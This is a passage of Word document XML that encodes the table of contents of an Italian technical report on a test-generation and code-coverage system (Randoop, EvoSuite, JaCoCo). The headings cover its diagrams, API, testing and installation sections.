            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195743" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.1 Play</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195743 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B05C8E6" w14:textId="0D8E21F5" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195744" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.2 Generazione Test Randoop</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195744 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="17F8F4FA" w14:textId="063C0EE8" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195745" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.3 Generazione Test EvoSuite</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195745 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44DAD0FE" w14:textId="369A459D" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195746" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.3.4 Flusso di attività completo</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195746 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="199086A1" w14:textId="197A954C" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195747" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.4 Component Diagram</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195747 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5889869C" w14:textId="320D3A94" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195748" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.5 Deployment Diagram</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195748 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2EFDEA63" w14:textId="00839C54" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195749" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4 Documentazione API</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195749 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5E159807" w14:textId="2A6C1AEE" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195750" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.1 getCoverage</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195750 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7D7629FE" w14:textId="313DB259" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195751" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.2 compile-and-codecoverage (JaCoCo)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195751 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3935F33B" w14:textId="57BA5C60" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195752" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.3 compile-and-codecoverage (EvoSuite)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195752 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65C0DEF2" w14:textId="1B279B2A" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195753" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5 Testing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195753 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3335D2D1" w14:textId="76792068" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195754" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1 Test di integrazione</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195754 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32E55ACB" w14:textId="0372C179" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195755" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2 Report generazione classi di test</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195755 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="23D8E06F" w14:textId="7770E7E1" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195756" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.1 Report Randoop</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195756 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5226CF20" w14:textId="63534270" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195757" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2.2 Report EvoSuite</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195757 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="35E4DF6F" w14:textId="126A9AC5" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195758" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3 Problemi di sicurezza</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195758 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="002F7B9F">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="285C72E0" w14:textId="5050D35C" w:rsidR="007C4C90" w:rsidRDefault="007C4C90">
          <w:pPr>
            <w:pStyle w:val="Sommario1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9628"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:lang w:eastAsia="it-IT"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc148195759" w:history="1">
            <w:r w:rsidRPr="00EC70E2">
              <w:rPr>
                <w:rStyle w:val="Collegamentoipertestuale"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6 Installazione ed Esecuzione</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc148195759 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
